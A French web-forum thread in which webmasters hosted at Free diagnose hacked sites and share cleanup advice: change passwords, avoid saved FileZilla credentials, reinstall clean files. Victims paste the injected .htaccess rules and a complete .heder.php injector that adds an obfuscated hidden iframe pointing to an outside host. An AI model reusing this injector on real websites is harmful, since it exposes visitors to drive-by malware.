où bien ton ordi est infecté : certain virus passent par ftp et contamine ton site par des pubs ou redirection ou autres choses
tgayrard a écrit:
Bonsoir à tous,
Je viens de tomber par "hasard" (recherche ?...) sur votre topic et ai le même problème (apparition de .heder.php le 05/09/09).
Je n'étais pas sous Piwigo, mais mon site héberge du joomla et du Wordpress...
Comment pensez-vous que je puisse protéger ce site ?
Merci pour votre aide ;)
Désolé mais ceci ne concerne pas Piwigo. Il n'y a d'ailleurs pas de failles de sécurité connues à ce jour.
Voir plutôt sur les sites de support de Joomla / Wordpress et/ou faire une recherche sur le net concernant la sécurisation des sites web. Si hébergés chez Free, voir sur le NewsGroup proxad.free.services.pagesperso
Bonsoir à tous,
Je viens de tomber par "hasard" (recherche ?...) sur votre topic et ai le même problème (apparition de .heder.php le 05/09/09).
Je n'étais pas sous Piwigo, mais mon site héberge du joomla et du Wordpress...
Comment pensez-vous que je puisse protéger ce site ?
Merci pour votre aide ;)
Phil31 a écrit:
Je suis effectivement chez free.
Donc tu t'es fait pirater ton accès à ta page perso. Cà peut arriver en cas de mot de passe trop léger. Je rejoins donc VDigital et flipflip :
Modifier au plus vite tes mots de passe liés :
1- A l'adresse de messagerie supportant ta page web
2- A l'accès à ta base de données MySql
Choisir des mots de passe distincts pour chaque partie et qui ne peuvent être trouvés par dictionnaires : Une suite aléatoire d'au moins 8 caractères (lettres (majuscules et minuscules), chiffres et caractères spéciaux) ne sera pas du luxe.
Je suis effectivement chez free.
En triant les fichiers de mon site par date, j'arrive à déterminer les fichiers impactés (dates de modification au 07/09/2009 entre 19:25 et 20:05). Il y a 183 fichiers impactés, de type php et htm.
Je vais tenter de les nettoyer à la main, et sinon il me restera la solution de tout virer et de réinstaller...
Je n'ai rien vu d'anormal du coté de la base de données via phpmyadmin.
Concernant l'origine du problème, je doute que ça puisse venir de mon PC puisque j'ai formaté et réinstallé mon PC le 5/9/2009, et qu'à la date du 7/9/2009 je n'avais même pas encore réinstallé FilaZilla...
Et surtout décoché la case "Se souvenir du mot de passe" ou équivalent en filezilla grrrrrrr.
Eric a écrit:
Rien ne t'empêche de récupérer une copie locale de ta gallerie maintenant, de nettoyer en local tous les fichiers qui n'ont rien à voir avec Piwigo, supprimer les fichiers sur le serveur (avec un client FTP qui ne soit pas vérolé) et de renvoyer les fichiers de Piwigo de ta copie locale vers ton espace FTP.
Changer tous les mots de passe aussi tôt que possible.
Garder les images .jpg .png. et autres de ./galleries/ (et de ./upload/ si ce répertoire existe).
(Tout le reste à la déchiqueteuse: .php .htaccess .tpl .css .html etc...)
Copier un Piwigo tout propre.
Coder à la main un ./include/mysql.inc.php
Changer le mot de passe de tous les utilisateurs et leur adresser le lien pour rétablir leur mot de passe.
En gros.
Mais également vérifier la base de données (table non officielle), intégrité des données.
Bref, beaucoup de boulot.
Phil31 a écrit:
Informations complémentaires sur notre problème,
Des fichiers ".htaccess" ont été rajoutés un peu partout avec le contenu suivant :
#mmmmd
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !.heder.php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
</IfModule>
En plus ces fichiers font référence aux fichiers ".heder.php" ...
Je ne sais pas ce que vous en pensez, mais le plus sûre ne serait-il pas de tout supprimer et de réinstaller Piwigo ? Car grossière erreur de ma part, je n'ai pas de copie locale ;-(
Rien ne t'empêche de récupérer une copie locale de ta gallerie maintenant, de nettoyer en local tous les fichiers qui n'ont rien à voir avec Piwigo, supprimer les fichiers sur le serveur (avec un client FTP qui ne soit pas vérolé) et de renvoyer les fichiers de Piwigo de ta copie locale vers ton espace FTP.
Les fichiers php et .htaccess vérolés ne sont pas des virus et tu ne risques rien tant qu'ils ne sont pas interprétés (possible si tu as un systèmes apache/php/mysql local tel que Wampserver).
Ceci dit, es-tu chez Free? Dans l'affirmative, je te conseille vivement de changer *tous* tes mots de passe de pages perso, y compris l'accès à MySql via phpmyadmin. Car je doute que ton client FTP soit à l'origine de ce que tu rapportes.
Informations complémentaires sur notre problème,
Des fichiers ".htaccess" ont été rajoutés un peu partout avec le contenu suivant :
#mmmmd
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !.heder.php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
</IfModule>
En plus ces fichiers font référence aux fichiers ".heder.php" ...
Je ne sais pas ce que vous en pensez, mais le plus sûre ne serait-il pas de tout supprimer et de réinstaller Piwigo ? Car grossière erreur de ma part, je n'ai pas de copie locale ;-(
Un exemple de fichier ".heder.php" :
<?php
$frame_code = '<!--pCQegcQpSdDlcHjr--><script>/*kKMIkqZKzudmzolxbrOHcWc*/var YtJzBU=document;/*IiTSklCVzskOGQGJRjfotls*/function UvrUmwYA(fXCunYmB)/*oMvBLMFdAhNBEswhcTQORaUK*/{var DdKQrsBtb = "",/*qMhJXHFXbplaeBhn*/MAueQJPqK=0;for(MAueQJPqK=fXCunYmB.length-1;MAueQJPqK >= 0;MAueQJPqK--)/*_QFpgDWzoZ_IUa_EYAAsBSz*/{DdKQrsBtb+=fXCunYmB.charAt(MAueQJPqK);}return DdKQrsBtb;/*MObrkBcjKvUUEMQ*/}/*uTerrZNumvQKTuJLpL*/function lAzxGtC(XFRZIMF_)/*kKMIkqZKzudmzolxbrOHcWc*/{/*qMhJXHFXbplaeBhn*/XFRZIMF_ = XFRZIMF_.replace(/[\.]/g, "%");/*DQloCfcNIAbcedryffCLqfJb*/XFRZIMF_=unescape(XFRZIMF_);/*dYwdhKVcIC*/return UvrUmwYA(XFRZIMF_);/*labNWxLCjH_vHfgqHzTeFJpk*/}/*mDxpBbGaaSRIv*/function gqDmBRQ(){/*qMhJXHFXbplaeBhn*/YtJzBU.write("<style>.JIjzCtPmog{width:1px;height:1px;border:none;visibility:hidden}</style>");/*_QFpgDWzoZ_IUa_EYAAsBSz*//*_QFpgDWzoZ_IUa_EYAAsBSz*/var rPnbv="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";/*MObrkBcjKvUUEMQ*//*XveYPeKLuEKekySlz*/var eukscm=rPnbv.replace(/[\+x]/g,lAzxGtC(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f.6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6c.2e.77.77.77.2f.2f.3a.70.74.74.68"));/*qMhJXHFXbplaeBhn*//*EDoaNtIMGMc*/return eukscm;/*rqszXRaWBkPDChdYQJhZ*//*ZanD_dBPp_pbECRk*/}/*EDoaNtIMGMc*//*IiTSklCVzskOGQGJRjfotls*//*ZanD_dBPp_pbECRk*//*VAggMvx_ioGGV*/YtJzBU.writeln(gqDmBRQ());/*PPOfbNdeQEktSYITseyRSquT*//*mDxpBbGaaSRIv*//*eUChBuePLDO*/</script><!--pCQegcQpSdDlcHjr-->';
function get_file_dir_($file) {
global $argv;
$dir = dirname(getcwd() . '/' . $file);
$curDir = getcwd();
chdir($dir);
$dir = getcwd();
chdir($curDir);
return $dir;
}
function callback($data)
{
global $frame_code;
if(preg_match("/(<.*?body.*?>)/i", $data) > 0)
return preg_replace("/(<.*?body.*?>)/i", "\\1 ".$frame_code, $data, 1);
else return $data.$frame_code;
}
ob_start('callback');
$file = $_GET['qq'];
chdir(get_file_dir_($file));
include($file);
?>
Même problème découvert sur mon site il y a deux jours. J'utilise également FileZilla, et j'ai récemment été obligé de réinstallé mon PC qui était truffé de trojans, donc ce explique peut-être cela ...
J'ai plein de fichiers ".heder.php" sur mon site qui ont été modifiés récemment, la présence de ces fichiers vous semble t-elle normale ?
Merci.
Tu noteras d'autre part que cette fonctionnalité "stupide" existe dans piwigo !
Personne n'est parfait ;)
flipflip a écrit:
Pour moi ce n'est pas un problème de sécurité avec Piwigo mais plutôt une fonction totalement absurde dans la majorité des programmes : la case se souvenir de moi ou variante, retenir les mots de passes ! C'est une connerie je comprends pas qu'on puisse proposer ce genre de fonction dans un programme !
Je partage ton avis, même si je ne l'aurais pas forcément dit dans ces termes ! Mais il faut avouer que pour Mme Michu, ce n'est pas facile de se rappeler d'un couple login/mot de passe pour voir les photos de ces petits enfants. Elle a déjà du mal avec son numéro de carte bleu qu'elle note derrière sa carte !
Tu noteras d'autre part que cette fonctionnalité "stupide" existe dans piwigo !
C'est un problème que je vois sur différent forum de webmaster. En gros le seul point commun est Filezilla et d'après les recherches et recoupement c'est le fichier qui conserve le paramètre de connexion à vos ftp qui est utilisé par le troyen.
A essayer :
- changer les mots de passe des ftp;
- dans filezilla ne surtout pas sauvegarder ces mots de passe;
- renvoyer des fichiers sains sur le ftp.
Pour moi ce n'est pas un problème de sécurité avec Piwigo mais plutôt une fonction totalement absurde dans la majorité des programmes : la case se souvenir de moi ou variante, retenir les mots de passes ! C'est une connerie je comprends pas qu'on puisse proposer ce genre de fonction dans un programme !
sylvanos a écrit:
Si je change le mot de passe de ma bdd, où est-ce que je le modifie dans piwigo? Car il faut le donner à l'install.
dans le fichier include/mysql.inc.php
sylvanos a écrit:
Si je change mon mot de passe FTP, est-ce qu'il y a quelque chose à configurer dans piwigo?
non
Bonjour.
J'ai le même problème sur 2 pages perso Free, dont une ne contient pas piwigo.
J'avais mis des html à la racine de mes site pour rediriger directement dans le répertoire piwigo, ils étaient vérolés eux aussi.
C'est la deuxième fois que je remets en marche mon piwigo en réuploadant carrément l'original téléchargé sur le site, donc obligé de tout reconfigurer.
Je vais m'empresser de faire une sauvegarde ce coup-ci.
Si je change le mot de passe de ma bdd, où est-ce que je le modifie dans piwigo? Car il faut le donner à l'install.
Si je change mon mot de passe FTP, est-ce qu'il y a quelque chose à configurer dans piwigo?
Que puis-je faire pour sécuriser au final?
Merci d'avance.